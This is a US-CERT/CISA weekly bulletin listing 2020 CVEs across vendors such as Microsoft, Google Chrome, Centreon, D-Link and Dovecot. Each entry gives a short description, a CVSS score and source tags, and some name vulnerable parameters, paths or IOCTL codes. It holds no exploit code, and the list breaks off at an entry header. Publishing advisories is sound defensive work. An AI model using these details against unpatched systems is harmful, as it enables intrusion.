Vulnerability Summary for the Week of May 18, 2020

US-CERT All NCAS Products - Mon, 05/25/2020 - 11:33
Original release date: May 25, 2020


The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities
Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
amd -- overdrive
  An issue was discovered in AODDriver2.sys in AMD OverDrive. The vulnerable driver exposes a wrmsr instruction via IOCTL 0x81112ee0 and does not properly filter the Model Specific Register (MSR). Allowing arbitrary MSR writes can lead to Ring-0 code execution and escalation of privileges. 2020-05-18 7.5 CVE-2019-7247
MISC centreon -- centreon
  Centreon before 19.04.15 allows remote attackers to execute arbitrary OS commands by placing shell metacharacters in RRDdatabase_status_path (via a main.get.php request) and then visiting the include/views/graphs/graphStatus/displayServiceStatus.php page. 2020-05-21 9 CVE-2020-13252
MISC
MISC
MISC
MISC cherokee_project -- cherokee
  In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many "Host: 127.0.0.1" headers. 2020-05-18 7.5 CVE-2019-20800
MISC
MISC covidsafe -- covidsafe
  OpenTrace, as used in COVIDSafe through v1.0.17, TraceTogether, ABTraceTogether, and other applications on iOS and Android, allows remote attackers to conduct long-term re-identification attacks and possibly have unspecified other impact, because of how Bluetooth is used. 2020-05-18 7.5 CVE-2020-12856
MISC
MISC
MISC d-link -- dap-1360_devices
  An issue was discovered on D-Link DAP-1360 revision F devices. Remote attackers can start a telnet service without authorization via an undocumented HTTP request. Although this is the primary vulnerability, the impact depends on the firmware version. Versions 609EU through 613EUbeta were tested. Versions through 6.12b01 have weak root credentials, allowing an attacker to gain remote root access. After 6.12b01, the root credentials were changed but the telnet service can still be started without authorization. 2020-05-15 10 CVE-2019-18666
MISC
MISC
MISC druva -- insync_windows_client
  Relative path traversal in Druva inSync Windows Client 6.6.3 allows a local, unauthenticated attacker to execute arbitrary operating system commands with SYSTEM privileges. 2020-05-21 7.2 CVE-2020-5752
MISC
MISC eq-3 -- homematic_ccu2_and_ccu3_devices
  eQ-3 Homematic Central Control Unit (CCU)2 through 2.51.6 and CCU3 through 3.51.6 allow Remote Code Execution in the JSON API Method ReGa.runScript, by unauthenticated attackers with access to the web interface, due to the default auto-login feature being enabled during first-time setup (or factory reset). 2020-05-15 7.5 CVE-2020-12834
MISC facebook -- proxygen
  A use-after-free is possible due to an error in lifetime management in the request adaptor when a malicious client invokes request error handling in a specific sequence. This issue affects versions of proxygen prior to v2020.05.18.00. 2020-05-18 7.5 CVE-2020-1897
CONFIRM freerdp -- freerdp
  libfreerdp/codec/planar.c in FreeRDP version > 1.0 through 2.0.0-rc4 has an Out-of-bounds Write. 2020-05-15 7.5 CVE-2020-11521
MISC
CONFIRM
CONFIRM ivanti -- workspace_control
  In Ivanti WorkSpace Control before 10.4.40.0, a user can elevate rights on the system by hijacking certain user registries. This is possible because pwrgrid.exe first checks the Current User registry hives (HKCU) when starting an application with elevated rights. 2020-05-18 7.2 CVE-2019-17066
CONFIRM logkitty -- logkitty
  Lack of output sanitization allowed an attacker to execute arbitrary shell commands via the logkitty npm package before version 0.7.1. 2020-05-15 7.5 CVE-2020-8149
MISC mariadb -- connector/c
  libmariadb/mariadb_lib.c in MariaDB Connector/C before 3.1.8 does not properly validate the content of an OK packet received from a client. NOTE: although mariadb_lib.c was originally based on code shipped for MySQL, this issue does not affect any MySQL components supported by Oracle. 2020-05-20 7.5 CVE-2020-13249
MISC
MISC microsoft -- multiple_products
  A remote code execution vulnerability exists in Microsoft Excel software when the software fails to properly handle objects in memory, aka 'Microsoft Excel Remote Code Execution Vulnerability'. 2020-05-21 7.5 CVE-2020-0901
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists when Windows fails to properly handle objects in memory, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1010, CVE-2020-1068. 2020-05-21 7.2 CVE-2020-1079
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1174, CVE-2020-1175. 2020-05-21 9.3 CVE-2020-1176
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1175, CVE-2020-1176. 2020-05-21 9.3 CVE-2020-1174
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Block Level Backup Engine Service (wbengine) that allows file deletion in arbitrary locations. To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1068, CVE-2020-1079. 2020-05-21 7.2 CVE-2020-1010
MISC microsoft -- multiple_windows_products
  An elevation of privilege vulnerability exists in Windows Media Service that allows file creation in arbitrary locations. To exploit the vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1010, CVE-2020-1079. 2020-05-21 7.2 CVE-2020-1068
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1174, CVE-2020-1176. 2020-05-21 9.3 CVE-2020-1175
MISC microsoft -- multiple_windows_products
  A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1174, CVE-2020-1175, CVE-2020-1176. 2020-05-21 9.3 CVE-2020-1051
MISC microweber -- microweber
  Microweber 1.1.18 allows Unrestricted File Upload because admin/view:modules/load_module:users#edit-user=1 does not verify that the file extension (used with the Add Image option on the Edit User screen) corresponds to an image file. 2020-05-20 7.2 CVE-2020-13241
MISC mikrotik -- mikrotik-router-monitoring-system
  An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community. 2020-05-16 7.5 CVE-2020-13118
MISC
MISC misp_project -- misp_maltego
  MISP MISP-maltego 1.4.4 incorrectly shares a MISP connection across users in a remote-transform use case. 2020-05-15 7.5 CVE-2020-12889
MISC mylittleteels -- mylittleadmin
  The management tool in MyLittleAdmin 3.8 allows remote attackers to execute arbitrary code because machineKey is hardcoded (the same for all customers' installations) in web.config, and can be used to send serialized ASP code. 2020-05-19 7.5 CVE-2020-13166
MISC
MISC netgear -- multiple_products
  An issue was discovered on NETGEAR Orbi Tri-Band Business WiFi Add-on Satellite (SRS60) AC3000 V2.5.1.106, Outdoor Satellite (RBS50Y) V2.5.1.106, and Pro Tri-Band Business WiFi Router (SRR60) AC3000 V2.5.1.106. The root account has the same password as the Web-admin component. Thus, by exploiting CVE-2020-11551, it is possible to achieve remote code execution with root privileges on the embedded Linux system. 2020-05-18 8.3 CVE-2020-11549
MISC
MISC
MISC netsweeper -- netsweeper
  Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters. 2020-05-19 7.5 CVE-2020-13167
MISC nintendo -- nintendo_64_devices
  Morita Shogi 64 through 2020-05-02 for Nintendo 64 devices allows remote attackers to execute arbitrary code via crafted packet data to the built-in modem because 0x800b3e94 (aka the IF subcommand to top-level command 7) has a stack-based buffer overflow. 2020-05-16 7.5 CVE-2020-13109
MISC
MISC oblac -- jodd
  Jodd before 5.0.4 performs Deserialization of Untrusted JSON Data when setClassMetadataName is set. 2020-05-21 7.5 CVE-2018-21234
MISC
MISC
MISC panasonic -- multiple_devices
  Panasonic P110, Eluga Z1 Pro, Eluga X1, and Eluga X1 Pro devices through 2020-04-10 have Insecure Permissions. NOTE: the vendor states that all affected products are at "End-of-software-support." 2020-05-20 7.5 CVE-2020-11716
CONFIRM panasonic -- p99_devices
  Panasonic P99 devices through 2020-04-10 have Incorrect Access Control. NOTE: the vendor states that all affected products are at "End-of-software-support." 2020-05-19 7.5 CVE-2020-11715
CONFIRM panasonic -- video_insight
  Video Insight VMS 7.5 and earlier allows remote attackers to conduct code injection attacks via unspecified vectors. 2020-05-20 7.5 CVE-2019-5997
MISC
MISC raonwiz -- k_upload
  In RAONWIZ K Upload v2018.0.2.51 and prior, automatic update processing without an integrity check on the update module (web.js) allows an attacker to modify arguments, which causes a random DLL to be downloaded and injected. 2020-05-21 7.5 CVE-2020-7808
CONFIRM smartbear -- readyapi_soapui_pro
  An issue was discovered in SmartBear ReadyAPI SoapUI Pro 3.2.5. Due to unsafe use of a Java RMI-based protocol in an unsafe configuration, an attacker can inject malicious serialized objects into the communication, resulting in remote code execution in the context of a client-side Network Licensing Protocol component. 2020-05-20 7.5 CVE-2020-12835
MISC
FULLDISC
MISC
MISC stashcat -- stashcat
  An issue was discovered in the stashcat app through 3.9.1 for macOS, Windows, Android, iOS, and possibly other platforms. The GET method is used with client_key and device_id data in the query string, which allows attackers to obtain sensitive information by reading web-server logs. 2020-05-18 9 CVE-2020-13129
MISC
MISC tibco_software -- multiple_jproducts
  The administrative UI component of TIBCO Software Inc.'s TIBCO JasperReports Server, TIBCO JasperReports Server for AWS Marketplace, and TIBCO JasperReports Server for ActiveMatrix BPM contains a vulnerability that theoretically allows an unauthenticated attacker to obtain the permissions of a JasperReports Server "superuser" for the affected systems. The attacker can theoretically exploit the vulnerability consistently, remotely, and without authenticating. Affected releases are TIBCO Software Inc.'s TIBCO JasperReports Server: versions 7.1.1 and below, TIBCO JasperReports Server for AWS Marketplace: versions 7.1.1 and below, and TIBCO JasperReports Server for ActiveMatrix BPM: versions 7.1.1 and below. 2020-05-20 10 CVE-2020-9409
CONFIRM vandyke -- securecrt
  SecureCRT before 8.7.2 allows remote attackers to execute arbitrary code via an Integer Overflow and a Buffer Overflow because a banner can trigger a line number to CSI functions that exceeds INT_MAX. 2020-05-15 10 CVE-2020-12651
MISC
MISC
CONFIRM
MISC wso2 -- api_manager
  WSO2 API Manager 3.0.0 does not properly restrict outbound network access from a Publisher node, opening up the possibility of SSRF to this node's entire intranet. 2020-05-20 7.5 CVE-2020-13226
MISC
MISC
MISC
MISC

Medium Vulnerabilities
Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
amd -- ati_diagnostics_hardware_sys/overclocking_utility
  An issue was discovered in atillk64.sys in AMD ATI Diagnostics Hardware Abstraction Sys/Overclocking Utility 5.11.9.0. The vulnerable driver exposes a wrmsr instruction and does not properly filter the Model Specific Register (MSR). Allowing arbitrary MSR writes can lead to Ring-0 code execution and escalation of privileges. 2020-05-18 4.6 CVE-2019-7246
MISC apache -- couchdb
  CouchDB version 3.0.0 shipped with a new configuration setting that governs access control to the entire database server called `require_valid_user_except_for_up`. It was meant as an extension to the long-standing setting `require_valid_user`, which in turn requires that any and all requests to CouchDB will have to be made with valid credentials, effectively forbidding any anonymous requests. The new `require_valid_user_except_for_up` is an off-by-default setting that was meant to allow requiring valid credentials for all endpoints except for the `/_up` endpoint. However, the implementation of this made an error that led to not enforcing credentials on any endpoint, when enabled. CouchDB versions 3.0.1[1] and 3.1.0[2] fix this issue. 2020-05-20 6.8 CVE-2020-1955
MISC apache -- tomcat
  When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. 2020-05-20 6.8 CVE-2020-9484
SUSE
MLIST
MISC
MLIST
MLIST apt -- apt
  Missing input validation in the ar/tar implementations of APT before version 2.1.2 could result in denial of service when processing specially crafted deb files. 2020-05-15 4.3 CVE-2020-3810
MISC
MISC
MISC
MISC
MISC bitdefender -- bitdefender_engines
  Improper Input Validation vulnerability in the cevakrnl.rv0 module as used in the Bitdefender Engines allows an attacker to trigger a denial of service while scanning a specially-crafted sample. This issue affects: Bitdefender Bitdefender Engines versions prior to 7.84063. 2020-05-15 5 CVE-2020-8100
MISC bluetooth -- bluetooth_core_specification
  Legacy pairing and secure-connections pairing authentication in Bluetooth® BR/EDR Core Specification v5.2 and earlier may allow an unauthenticated user to complete authentication without pairing credentials via adjacent access. An unauthenticated, adjacent attacker could impersonate a Bluetooth BR/EDR master or slave to pair with a previously paired remote device to successfully complete the authentication procedure without knowing the link key. 2020-05-19 4.8 CVE-2020-10135
MISC
CERT-VN
CONFIRM bluetooth -- core
  Pairing in Bluetooth® Core v5.2 and earlier may permit an unauthenticated attacker to acquire credentials with two pairing devices via adjacent access when the unauthenticated user initiates different pairing methods in each peer device and an end-user erroneously completes both pairing procedures with the MITM using the confirmation number of one peer as the passkey of the other. An adjacent, unauthenticated attacker could be able to initiate any Bluetooth operation on either attacked device exposed by the enabled Bluetooth profiles. This exposure may be limited when the user must authorize certain access explicitly, but so long as a user assumes that it is the intended remote device requesting permissions, device-local protections may be weakened. 2020-05-19 4.3 CVE-2020-10134
CERT-VN
CONFIRM cacti -- cacti
  In Cacti before 1.2.11, disabling a user account does not immediately invalidate any permissions granted to that account (e.g., permission to view logs). 2020-05-20 4 CVE-2020-13230
MISC
MISC cacti -- cacti
  In Cacti before 1.2.11, auth_profile.php?action=edit allows CSRF for an admin email change. 2020-05-20 4.3 CVE-2020-13231
MISC
MISC cellebrite -- ufed
  Cellebrite UFED 5.0 to 7.5.0.845 implements local operating system policies that can be circumvented to obtain a command prompt via the Windows file dialog that is reachable via the Certificate-Based Authentication option of the Wireless Network Connection screen. 2020-05-15 4.6 CVE-2020-12798
MISC
MISC
MISC
MISC
MISC cherokee_project -- cherokee
  In Cherokee through 1.2.104, multiple memory corruption errors may be used by a remote attacker to destabilize the work of a server. 2020-05-18 5 CVE-2019-20799
MISC
MISC
MISC
MISC
MISC cherokee_project -- cherokee
  An XSS issue was discovered in handler_server_info.c in Cherokee through 1.2.104. The requested URL is improperly displayed on the About page in the default configuration of the web server and its administrator panel. The XSS in the administrator panel can be used to reconfigure the server and execute arbitrary commands. 2020-05-18 6 CVE-2019-20798
MISC
MISC covidsafe -- covidsafe
  Non-reinitialisation of random data in the advertising payload in COVIDSafe v1.0.15 and v1.0.16 allows a remote attacker to re-identify Android devices running COVIDSafe by scanning for their advertising beacons. 2020-05-18 5 CVE-2020-12858
MISC
MISC covidsafe -- covidsafe
  Caching of GATT characteristic values (TempID) in COVIDSafe v1.0.15 and v1.0.16 allows a remote attacker to long-term re-identify an Android device running COVIDSafe. 2020-05-18 5 CVE-2020-12857
MISC
MISC
MISC covidsafe -- covidsafe
  COVIDSafe through v1.0.17 allows a remote attacker to access phone name and model information because a BLE device can have four roles and COVIDSafe uses all of them. This allows for re-identification of a device, and potentially identification of the owner's name. 2020-05-18 5 CVE-2020-12860
MISC
MISC covidsafe -- covidsafe
  Unnecessary fields in the OpenTrace/BlueTrace protocol in COVIDSafe through v1.0.17 allow a remote attacker to identify a device model by observing cleartext payload data. This allows re-identification of devices, especially less common phone models or those in low-density situations. 2020-05-18 5 CVE-2020-12859
MISC
MISC d-link -- dsp-w215_devices
  D-Link DSP-W215 1.26b03 devices send an obfuscated hash that can be retrieved and understood by a network sniffer. 2020-05-18 5 CVE-2020-13136
MISC dell -- isilon
  Dell EMC Isilon versions 8.2.2 and earlier contain a remotesupport vulnerability. The pre-configured support account, remotesupport, is bundled in the Dell EMC Isilon OneFS installation. This account is used for diagnostics and other support functions. Although the default password is different for every cluster, it is predictable. 2020-05-20 5 CVE-2020-5365
MISC dell -- isilon_onefs
  Dell EMC Isilon OneFS versions 8.2.2 and earlier contain an SNMPv2 vulnerability. The SNMPv2 service is enabled, by default, with a pre-configured community string. This community string allows read-only access to many aspects of the Isilon cluster, some of which are considered sensitive and can foster additional access. 2020-05-20 5 CVE-2020-5364
MISC digi -- xbee_2_devices
  Digi XBee 2 devices do not have an effective protection mechanism against remote AT commands, because of issues related to the network stack upon which the ZigBee protocol is built. 2020-05-21 5.5 CVE-2017-18868
MISC dolibarr -- dolibarr
  The DMS/ECM module in Dolibarr 11.0.4 allows users with the 'Setup documents directories' permission to rename uploaded files to have insecure file extensions. This bypasses the .noexe protection mechanism against XSS. 2020-05-20 5.5 CVE-2020-13240
MISC dovecot -- dovecot
  In Dovecot before 2.3.10.1, unauthenticated sending of malformed parameters to a NOOP command causes a NULL Pointer Dereference and crash in submission-login, submission, or lmtp. 2020-05-18 5 CVE-2020-10957
MISC
FULLDISC
MLIST
MISC
FEDORA
UBUNTU
DEBIAN
CONFIRM dovecot -- dovecot
  In Dovecot before 2.3.10.1, a crafted SMTP/LMTP message triggers an unauthenticated use-after-free bug in submission-login, submission, or lmtp, and can lead to a crash under circumstances involving many newlines after a command. 2020-05-18 5 CVE-2020-10958
MISC
FULLDISC
MLIST
MISC
FEDORA
UBUNTU
DEBIAN
CONFIRM dovecot -- dovecot
  In Dovecot before 2.3.10.1, remote unauthenticated attackers can crash the lmtp or submission process by sending mail with an empty localpart. 2020-05-18 5 CVE-2020-10967
MISC
FULLDISC
MLIST
MISC
FEDORA
UBUNTU
DEBIAN
CONFIRM dpdk -- dpdk
  A memory corruption issue was found in DPDK versions 17.05 and above. This flaw is caused by an integer truncation on the index of a payload. Under certain circumstances, the index (a UInt) is copied and truncated into a uint16, which can lead to out of bound indexing and possible memory corruption. 2020-05-19 4.6 CVE-2020-10723
SUSE
MISC
CONFIRM
UBUNTU
MISC dpdk -- dpdk
  A vulnerability was found in DPDK versions 18.05 and above. A missing check for an integer overflow in vhost_user_set_log_base() could result in a smaller memory map than requested, possibly allowing memory corruption. 2020-05-19 4.6 CVE-2020-10722
SUSE
MISC
CONFIRM
UBUNTU
MISC dpdk -- dpdk
  A flaw was found in DPDK version 19.11 and above that allows a malicious guest to cause a segmentation fault of the vhost-user backend application running on the host, which could result in a loss of connectivity for the other guests running on that host. This is caused by a missing validity check of the descriptor address in the function `virtio_dev_rx_batch_packed()`. 2020-05-20 4 CVE-2020-10725
SUSE
MISC
CONFIRM
MISC e6y -- prboom-plus
  An issue was discovered in e6y prboom-plus 2.5.1.5. There is a buffer overflow in client and server code responsible for handling received UDP packets, as demonstrated by I_SendPacket or I_SendPacketTo in i_network.c. 2020-05-18 5 CVE-2019-20797
MISC
MISC
MISC edx -- open_edx_ironwood
  Studio in Open edX Ironwood 2.5, when CodeJail is not used, allows a user to go to the "Create New course>New section>New subsection>New unit>Add new component>Problem button>Advanced tab>Custom Python evaluated code" screen, edit the problem, and execute Python code. This leads to arbitrary code execution. 2020-05-18 6.5 CVE-2020-13144
MISC
MISC
MISC edx -- open_edx_ironwood
  Studio in Open edX Ironwood 2.5 allows CSV injection because an added cohort in Course>Instructor>Cohorts may contain a formula that is exported via the "Course>Data Downloads>Reports>Download profile info" feature. 2020-05-18 6.8 CVE-2020-13146
MISC em-imap -- em-imap
  em-imap 0.5 uses the library eventmachine in an insecure way that allows an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified. 2020-05-19 5.8 CVE-2020-13163
MISC estsoft -- alsong
  ALSong 3.46 and earlier versions contain a Document Object Model (DOM) based cross-site scripting vulnerability caused by improper validation of user input. A remote attacker could exploit this vulnerability by tricking the victim into opening an ALSong Album (sab) file. 2020-05-15 4.3 CVE-2020-7809
MISC
MISC freerdp -- freerdp
  libfreerdp/cache/bitmap.c in FreeRDP versions > 1.0 through 2.0.0-rc4 has an Out of bounds read. 2020-05-15 6.4 CVE-2020-11525
MISC
CONFIRM
CONFIRM
CONFIRM gilacms -- gila_cms
  Gila CMS before 1.11.6 has reflected XSS via the admin/content/postcategory id parameter, which is mishandled for g_preview_theme. 2020-05-21 4.3 CVE-2019-20803
MISC gilacms -- gila_cms
  Gila CMS before 1.11.6 allows CSRF with resultant XSS via the admin/themes URI, leading to compromise of the admin account. 2020-05-21 6.8 CVE-2019-20804
MISC gitea -- gitea
  An issue was discovered in Gitea through 1.11.5. An attacker can trigger a deadlock by initiating a transfer of a repository's ownership from one organization to another. 2020-05-20 5 CVE-2020-13246
MISC
MISC
MISC google -- chrome
  Insufficient policy enforcement in tab strip in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. 2020-05-21 4.3 CVE-2020-6476
MISC
MISC google -- chrome
  Inappropriate implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6478
MISC
MISC google -- chrome
  Insufficient policy enforcement in payments in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6483
MISC
MISC google -- chrome
  Inappropriate implementation in sharing in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6479
MISC
MISC google -- chrome
  Insufficient policy enforcement in downloads in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6487
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. 2020-05-21 6.8 CVE-2020-6471
MISC
MISC google -- chrome
  Inappropriate implementation in installer in Google Chrome on OS X prior to 83.0.4103.61 allowed a local attacker to perform privilege escalation via a crafted file. 2020-05-21 6.8 CVE-2020-6477
MISC
MISC google -- chrome
  Inappropriate implementation in developer tools in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had convinced the user to take certain actions in developer tools to obtain potentially sensitive information from disk via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6489
MISC
MISC google -- chrome
  Insufficient policy enforcement in downloads in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6488
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. 2020-05-21 4.3 CVE-2020-6482
MISC
MISC google -- chrome
  Insufficient data validation in ChromeDriver in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted request. 2020-05-21 4.3 CVE-2020-6484
MISC
MISC google -- chrome
  Insufficient data validation in media router in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6485
MISC
MISC google -- chrome
  Insufficient policy enforcement in navigations in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6486
MISC
MISC google -- chrome
  Insufficient data validation in loader in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had been able to write to disk to leak cross-origin data via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6490
MISC
MISC google -- chrome
  Use after free in speech recognizer in Google Chrome prior to 81.0.4044.113 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6457
MISC
MISC google -- chrome
  Insufficient data validation in site information in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted domain name. 2020-05-21 4.3 CVE-2020-6491
MISC
MISC google -- chrome
  Use after free in payments in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6459
MISC
MISC google -- chrome
  Use after free in Blink in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6474
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. 2020-05-21 6.8 CVE-2020-6469
MISC
MISC google -- chrome
  Use after free in WebRTC in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6467
MISC
MISC google -- chrome
  Use after free in media in Google Chrome prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6466
MISC
MISC google -- chrome
  Use after free in reader mode in Google Chrome on Android prior to 83.0.4103.61 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6465
MISC
MISC google -- chrome
  Insufficient policy enforcement in Blink in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6473
MISC
MISC google -- chrome
  Insufficient data validation in URL formatting in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to perform domain spoofing via a crafted domain name. 2020-05-21 4.3 CVE-2020-6460
MISC
MISC google -- chrome
  Insufficient policy enforcement in developer tools in Google Chrome prior to 83.0.4103.61 allowed an attacker who convinced a user to install a malicious extension to obtain potentially sensitive information from process memory or disk via a crafted Chrome Extension. 2020-05-21 4.3 CVE-2020-6472
MISC
MISC google -- chrome
  Insufficient validation of untrusted input in clipboard in Google Chrome prior to 83.0.4103.61 allowed a local attacker to inject arbitrary scripts or HTML (UXSS) via crafted clipboard contents. 2020-05-21 4.3 CVE-2020-6470
MISC
MISC google -- chrome
  Type confusion in Blink in Google Chrome prior to 81.0.4044.138 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6464
SUSE
MISC
MISC google -- chrome
  Incorrect implementation in full screen in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to spoof security UI via a crafted HTML page. 2020-05-21 4.3 CVE-2020-6475
MISC
MISC google -- chrome
  Insufficient policy enforcement in URL formatting in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to perform domain spoofing via a crafted domain name. 2020-05-21 4.3 CVE-2020-6481
MISC
MISC google -- chrome
  Type confusion in V8 in Google Chrome prior to 83.0.4103.61 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6468
MISC
MISC google -- chrome
  Out of bounds read and write in PDFium in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. 2020-05-21 6.8 CVE-2020-6458
MISC
MISC google -- chrome
  Use after free in storage in Google Chrome prior to 81.0.4044.129 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6461
MISC
MISC google -- chrome
  Use after free in task scheduling in Google Chrome prior to 81.0.4044.129 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6462
MISC
MISC google -- chrome
  Use after free in ANGLE in Google Chrome prior to 81.0.4044.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-05-21 6.8 CVE-2020-6463
MISC
MISC gwtupload -- gwtupload
  An issue was discovered in Manolo GWTUpload 1.0.3. server/UploadServlet.java (the servlet for handling file upload) accepts a delay parameter that causes a thread to sleep. It can be abused to cause all of a server's threads to sleep, leading to denial of service. 2020-05-18 5 CVE-2020-13128
MISC
MISC hive_solutions -- netius
  netius prior to 1.17.58 is vulnerable to HTTP Request Smuggling. HTTP pipelining issues and request smuggling attacks might be possible due to incorrect Transfer encoding header parsing which could allow for CL:TE or TE:TE attacks. 2020-05-21 4.3 CVE-2020-7655
MISC horde -- gollem
  Gollem before 3.0.13, as used in Horde Groupware Webmail Edition 5.2.22 and other products, is affected by a reflected Cross-Site Scripting (XSS) vulnerability via the HTTP GET dir parameter in the browser functionality, affecting breadcrumb output. An attacker can obtain access to a victim's webmail account by making them visit a malicious URL. 2020-05-18 4.3 CVE-2020-8034
CONFIRM
MISC
MISC
CONFIRM horde -- groupware_webmail_edition The image view functionality in Horde Groupware Webmail Edition before 5.2.22 is affected by a stored Cross-Site Scripting (XSS) vulnerability via an SVG image upload containing a JavaScript payload. An attacker can obtain access to a victim's webmail account by making them visit a malicious URL. 2020-05-18 4.3 CVE-2020-8035
CONFIRM
CONFIRM hp -- nimble_storage
  Potential remote code execution security vulnerabilities have been identified with HPE Nimble Storage systems that could be exploited by an attacker to gain elevated privileges on the array. The following NimbleOS versions, and all subsequent releases, contain a software fix for this vulnerability: 3.9.3.0, 4.5.6.0, 5.0.9.0, 5.1.4.100. 2020-05-19 6.5 CVE-2020-7138
MISC hp -- nimbleos
  Potential remote access security vulnerabilities have been identified with HPE Nimble Storage systems that could be exploited by an attacker to access and modify sensitive information on the system. The following NimbleOS versions, and all subsequent releases, contain a software fix for this vulnerability: 3.9.3.0, 4.5.6.0, 5.0.9.0, 5.1.4.100. 2020-05-19 5.5 CVE-2020-7139
MISC hp -- superdome_flex_server
